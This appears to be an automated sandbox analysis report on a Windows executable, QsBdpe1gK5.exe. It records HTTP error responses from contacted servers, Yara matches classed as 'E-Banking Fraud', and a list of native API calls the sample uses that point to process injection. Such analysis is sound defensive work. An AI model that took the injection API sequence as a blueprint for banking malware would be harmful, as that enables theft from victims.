                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:36:39 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DLxKC8RIvOvWYar4NPE6SghbWCE9mAlrjvLQ8mQG%2FhmsMgw3Pk6PWa5woNozuvvnTgwysMj8aSAqRMXp59ZvIOtcbs5oOBeVddBYpJ4Nw2tAtUgPD3NMfrVUp0unmcmwI4oj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90039494ae68c443-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1616&min_rtt=1616&rtt_var=808&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=722&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 64 36 0d 0a 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 29 ea 81 c3 6a 25 68 52 b5 52 28 11 b8 07 8e 06 6f e5 4a 6d 9c d8 5b 22 fe 1e 25 15 12 d7 99 37 a3 19 ba ab 5e d7 f6 a3 ad 61 6b 5f 1a 68 0f cf cd 6e 0d 8b 7b c4 5d 6d 37 88 95 ad 6e ce 43 51 22 d6 fb 05 1b 0a 7a 39 33 05 71 9e 0d e9 49 cf c2 ab 72 05 fb a8 b0 89 d7 ce 13 de 44 43 38 43 f4 19 fd cf 94 5b f2 3f 26 2c d9 50 cf 36 08 24 19 ae 92 55 3c 1c de 1a 18 5d 86 2e 2a 1c 27 0e 62 07 1a 4e 19 b2 a4 6f 49 05 61 3f 35 25 36 e4 bc 4f 92 33 3f f5 ee 2b 08 bc cf 00 38 85 71 1c 8b 8b cb 2a 69 18 8a 3e 45 68 63 52 78 2c 09 ff 22 86 70 de 44 38 7f f9 05 00 00 ff ff e3 02 00 2a 59 1a 36 06 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: fd6LN0Dw)j%hRR(oJm["%7^ak_hn{]m7nCQ"z93qIrDC8C[?&,P6$U<].*'bNoIa?5%6O3?+8q*i>EhcRx,"pD8*Y60
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Sat, 11 Jan 2025 08:36:42 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=adSmNktWpLTAXUHEC0JV%2F00WnQwDDeyVMLNfRsbj3EBI%2Bt8PuZez1AfURSKE4iJS2VpXo2C7lzJwGkOJlI619kmm6TuEgR3OvFdW5r%2B7ADpoz65tN6Ea%2BpZXgvc5roTZ9clc"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 900394a49ea60f36-EWR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1435&min_rtt=1435&rtt_var=717&sent=4&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10804&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Sat, 11 Jan 2025 08:36:45 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cpqFH0MV3vAGIoiCJ5EB22Ee7XKFmQG%2FjQlyFjxA2nZqD6FnQezO4TL7XkPVtcnMvZuCWWQ6YwejTqlHRcYiIBU%2FeCX3NekvsksSKGgfBmLL%2BcdB3qWbGm8oKwC9tHTU1IoC"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 900394b489137d0e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1904&min_rtt=1904&rtt_var=952&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=439&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Ascii: 105<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.masterqq.pro Port 80</address></body></html>10
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 11 Jan 2025 08:37:57 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 11 Jan 2025 08:38:00 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 11 Jan 2025 08:38:03 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Sat, 11 Jan 2025 08:38:08 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Sat, 11 Jan 2025 08:38:11 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Sat, 11 Jan 2025 08:38:13 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Sat, 11 Jan 2025 08:38:16 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html; charset=utf-8
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic
HTTP traffic detected: HTTP/1.1 403 Forbidden
Date: Sat, 11 Jan 2025 08:38:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BgAp4OZBr9WUTAx15luT7q1YLAAyI%2FwJJD7iK7jdfJrpXgPMzm%2FHkmRuffp4pw4eNlR0fIursOBn22YEY1TVLQi2DTIsw1HYs7NRtbk28sD2ZiP2l7%2F7JcAuUgGujYLEatIyJCvEfw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 900397151dde4285-EWR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1608&rtt_var=804&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=714&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic
HTTP traffic detected: HTTP/1.1 403 Forbidden
Date: Sat, 11 Jan 2025 08:38:24 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oOlK6JPWivihzn1jbufvQePljqU0bfXC5wTFyAPQctq%2FhwYlx0EFFvji1%2BZHjGofLNz7QaF%2FRL6D6X5A6NuL5L%2BsYO9rDvtsG7WVpZTnw3xPwEK5rB6YUcBVs67riC3Ha1kiNBS2Sw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9003972518b70c88-EWR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1604&min_rtt=1604&rtt_var=802&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=734&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic
HTTP traffic detected: HTTP/1.1 403 Forbidden
Date: Sat, 11 Jan 2025 08:38:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YVygnqjWPGPr9NBEGFCsdGiBT65M%2F2Nrc290OqWsEATzcVtEei0twVSkQwcuiC7q5KxGBM7Ka9pWl7jdW5cLSk7GqD7EB6CnKjZ%2FreEXOnosE0xAZHd5XknHUvHckjAhoJZKUKiMlg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 900397351e9c43b9-EWR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2513&min_rtt=2513&rtt_var=1256&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10816&delivery_rate=0&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic
HTTP traffic detected: HTTP/1.1 403 Forbidden
Date: Sat, 11 Jan 2025 08:38:29 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4PI6f6bb8MkEFrNmwW4fj%2Bq7LIIkxnRAsHJYFg390iUJXN7HNwbgu5%2FCZWBlgFZOD5s5ce6uHy7fh68SMLKI%2FX9bTl6FAUhyPnVpHgYawPwYMih4StHzNGhZ6UxTcFhByA0Yd85dhA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90039744dc1343b1-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2497&min_rtt=2497&rtt_var=1248&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=443&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chro
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Sat, 11 Jan 2025 08:39:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
x-turbo-charged-by: LiteSpeed
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CEBCD8y5KK2n%2BrsBbonTmtvVY2Paq77HTOEx8sgSfdYraiT4PVE2S6C2tc5MntIBiC9rYpbnAaoyj1JCMq0g6ougWqlvkpAf3ny6OSV5clmreWElW9vLsJozMGPBp6kI9n0hqxCIH9%2BJ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9003991889030f78-EWR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1636&min_rtt=1636&rtt_var=818&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=720&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Sat, 11 Jan 2025 08:39:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
x-turbo-charged-by: LiteSpeed
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XAXpYLOYWnpWeejz%2BJ%2BHL7N7ePGHz1fPfgWPiCFLoisn9QDeRE45bEkzK%2BRsVpVHLLmGXixjdNf8G0kqmWcKH7gFjhH392LHLKAySBRssw27rWQiKCPNSiHsHbC8bwiQ97RMqKjViKel"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 900399286feede99-EWR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1629&min_rtt=1629&rtt_var=814&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=740&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Sat, 11 Jan 2025 08:39:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
x-turbo-charged-by: LiteSpeed
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ABNAt83oNbX1%2BxC9PZcogsWDBhlWCz32Ai61%2Fa2PGJjln2NRnnqP6zy7H2e%2BoMmV6RjaL7119DzTJo16HFtYrGck5qpFvhsS%2B9XdImzxz2xbNFUPC1yfL8qRb5y5DM5RK%2BVBGktkBs8k"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 900399384c6d8c41-EWR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1811&min_rtt=1811&rtt_var=905&sent=4&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10822&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Sat, 11 Jan 2025 08:39:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
x-turbo-charged-by: LiteSpeed
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OuMRHg8zPOKYYiFqQ7hQbJ5gCnjfyjrz9kWB21BvEQSp5nVxuDMCsg3t0yyVamWJIJSfgx35q2kH5ofNSNZguVMQtwoBiwl45HoeLMMovV096qWKsh7z7Ss4ZQVWiee30BgfgLY991jC"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 900399485b0cde93-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1578&min_rtt=1578&rtt_var=789&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=445&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Ascii: 4e3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica,
                      Source: global traffic
                      HTTP traffic detected: HTTP/1.1 404 Not Found
                        Server: awselb/2.0
                        Date: Sat, 11 Jan 2025 08:40:01 GMT
                        Content-Length: 0
                        Connection: close
                        WAFRule: 5
                      Source: global traffic
                      HTTP traffic detected: HTTP/1.1 404 Not Found
                        Date: Sat, 11 Jan 2025 08:40:07 GMT
                        Content-Type: text/html; charset=iso-8859-1
                        Transfer-Encoding: chunked
                        Connection: close
                        cf-cache-status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ti8Udf75Eo4n743kGB%2F9QPbb758G2bmcA1Bg6XRDpwzJlTE7VD4PVTyLdQ9dDyyciKIMAgK62j%2Fuf%2BDz1aDUv6IW%2Bexwuu5sRMbBygvlnA7x%2BQTGPrGGEXh%2BoHl8Qi71aRq6"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 900399a3cbaf43ee-EWR
                        Content-Encoding: gzip
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1705&rtt_var=852&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=702&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                        Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                        Data Ascii: f
                      Source: global traffic
                      HTTP traffic detected: HTTP/1.1 404 Not Found
                        Date: Sat, 11 Jan 2025 08:40:09 GMT
                        Content-Type: text/html; charset=iso-8859-1
                        Transfer-Encoding: chunked
                        Connection: close
                        cf-cache-status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9wKd7SpC5Ihip1i8tpWZqhMXbcZ2abVLvkidWSpdL1Om5RwtkW%2BmTg%2Fb4p62K1hKRW4gnvJwmzIwjiDE6FGv1cwEcxsLxfJoDb5zCQECZzWaSyddKkL2x3LwCrHrfm1QzQYd"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 900399b3b8508c0f-EWR
                        Content-Encoding: gzip
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=1993&min_rtt=1993&rtt_var=996&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=722&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                      Source: global traffic
                      HTTP traffic detected: HTTP/1.1 404 Not Found
                        Date: Sat, 11 Jan 2025 08:40:12 GMT
                        Content-Type: text/html; charset=iso-8859-1
                        Transfer-Encoding: chunked
                        Connection: close
                        cf-cache-status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IbpIwYfvCWaqPyEx4jFH54W8ykyO%2FKSHMVTsWG1pMWooMCEKVIPX6bPIYw%2FWwteRMGN%2FKg6gQhaZZ38Uu9p68cA5uanxe%2BDWi4NsMexLRrlA9tf3cCEelpu8oZiFuUYg7wys"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 900399c3aa008c0f-EWR
                        Content-Encoding: gzip
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=1982&min_rtt=1982&rtt_var=991&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10804&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                      Source: global traffic
                      HTTP traffic detected: HTTP/1.1 404 Not Found
                        Date: Sat, 11 Jan 2025 08:40:14 GMT
                        Content-Type: text/html; charset=iso-8859-1
                        Transfer-Encoding: chunked
                        Connection: close
                        cf-cache-status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fS7W5D9RuPmSFNyO6FHSzRPFDM5X5y0K5uMzRrpGxjwA3gb82qWOuP0M6SmBXAvLGYobPvK5TuG8BVTLpan7SQqTD7xBDwmP7DiPRIq5yIINQFJFPUYgldg%2BUrKxN5O1mLPw"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 900399d39bf78c0f-EWR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=1881&min_rtt=1881&rtt_var=940&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=439&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                        Data Ascii: 106<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.masterqq.pro Port 80</address></body></html>0

                      E-Banking Fraud

                      Source: Yara match, File source: 2.2.QsBdpe1gK5.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 2.2.QsBdpe1gK5.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 00000002.00000002.1841761840.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000004.00000002.4126273747.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000008.00000002.4129375797.0000000005340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000004.00000002.4126207300.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000002.00000002.1849388475.0000000001460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000002.00000002.1850179249.0000000001570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0042C8C3 NtClose,2_2_0042C8C3
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132B60 NtClose,LdrInitializeThunk,2_2_01132B60
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_01132DF0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_01132C70
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011335C0 NtCreateMutant,LdrInitializeThunk,2_2_011335C0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01134340 NtSetContextThread,2_2_01134340
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01134650 NtSuspendThread,2_2_01134650
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132B80 NtQueryInformationFile,2_2_01132B80
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132BA0 NtEnumerateValueKey,2_2_01132BA0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132BF0 NtAllocateVirtualMemory,2_2_01132BF0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132BE0 NtQueryValueKey,2_2_01132BE0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132AB0 NtWaitForSingleObject,2_2_01132AB0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132AD0 NtReadFile,2_2_01132AD0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132AF0 NtWriteFile,2_2_01132AF0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132D10 NtMapViewOfSection,2_2_01132D10
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132D00 NtSetInformationFile,2_2_01132D00
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132D30 NtUnmapViewOfSection,2_2_01132D30
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132DB0 NtEnumerateKey,2_2_01132DB0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132DD0 NtDelayExecution,2_2_01132DD0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132C00 NtQueryInformationProcess,2_2_01132C00
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132C60 NtCreateKey,2_2_01132C60
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132CA0 NtQueryInformationToken,2_2_01132CA0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132CC0 NtQueryVirtualMemory,2_2_01132CC0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132CF0 NtOpenProcess,2_2_01132CF0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132F30 NtCreateSection,2_2_01132F30
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132F60 NtCreateProcessEx,2_2_01132F60
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132F90 NtProtectVirtualMemory,2_2_01132F90
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132FB0 NtResumeThread,2_2_01132FB0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132FA0 NtQuerySection,2_2_01132FA0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132FE0 NtCreateFile,2_2_01132FE0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132E30 NtWriteVirtualMemory,2_2_01132E30
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132E80 NtReadVirtualMemory,2_2_01132E80
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132EA0 NtAdjustPrivilegesToken,2_2_01132EA0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132EE0 NtQueueApcThread,2_2_01132EE0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01133010 NtOpenDirectoryObject,2_2_01133010
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01133090 NtSetValueKey,2_2_01133090
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011339B0 NtGetContextThread,2_2_011339B0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01133D10 NtOpenProcessToken,2_2_01133D10
